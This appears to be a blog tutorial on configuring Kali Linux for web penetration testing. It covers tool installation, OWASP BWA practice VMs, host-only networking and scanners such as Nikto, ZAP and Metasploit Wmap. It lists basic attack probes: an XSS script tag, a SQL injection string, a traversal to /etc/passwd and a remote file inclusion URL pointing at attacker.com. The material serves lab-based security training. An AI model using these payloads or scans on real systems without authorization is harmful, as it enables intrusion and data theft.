Kali Linux Web Penetration Testing Configuration and Techniques

Updating and Upgrading Kali Linux

Before starting web application security testing, ensure all necessary tools are up-to-date.

apt-get update
apt-get upgrade
apt-get dist-upgrade

Installing and Running OWASP Mantra

OWASP Mentra entegrates Mozilla Firefox with security plugins for testing web application vulnerabilities.

apt-get install owasp-mantra-ff

Configuring Iceweasel Browser

Customize Iceweasel (Firefox variant) with essential security testing plugins:

  • Tamper Data
  • Cookies Manager+
  • Firebug
  • Hackbar
  • HTTP Requester
  • Passive Recon

Setting Up VirtualBox for Vulnerable VMs

Install VirtualBox to create isolated testing environments:

apt-get install virtualbox

Creating Vulnerable Virtual Machines

Download and import OWASP BWA (Broken Web Apps) VM for practice:

wget http://sourceforge.net/projects/owaspbwa/files/OWASP_Broken_Web_Apps_VM_1.1.1.ova

Configuring Client Virtual Machines

Download Microsoft Windows VMs for client-side testing from:

http://dev.modern.ie/tools/vms/#downloads

Network Configuration for Virtual Machines

Set up host-only networking in VirtualBox for secure communication:

  1. Go to File > Preferences > Network
  2. Add a new host-only network (vboxnet0)
  3. Configure VM network adapters to use host-only mode

Web Application Vulnerability Identification

Cross-Site Scripting (XSS)

Test for XSS vulnerabilities by injecting script tags:

<script>alert('XSS')</script>

SQL Injection

Test for SQL injection vulnerabilities:

' OR '1'='1

File Inclusion Vulnerabilities

Test for local and remote file inclusion:

../../../../etc/passwd
http://attacker.com/malicious.txt

SSL/TLS Configuraton Testing

Use SSLScan to check for weak encryption protocols:

sslscan 192.168.56.102

Automated Scanning Tools

Nikto

Comprehensive web server scanner:

nikto -h http://target.com -o results.html

Wapiti

Web application vulnerability scanner:

wapiti http://target.com -o wapiti_results -f html

OWASP ZAP

Integrated penetration testing tool with scanning capabilities:

  1. Configure browser to use ZAP proxy
  2. Right-click target site > Attack > Active Scan

w3af

Web application attack and audit framework:

w3af_gui

Vega

Open-source web vulnerability scanner:

vega

Metasploit Wmap

Metasploit module for web application scanning:

msfconsole
load wmap
wmap_sites -a http://target.com
wmap_run -e

Tags: Kali Linux Web Penetration Testing OWASP Security Tools Vulnerability Assessment

Posted on Thu, 02 Jul 2026 17:07:12 +0000 by dagee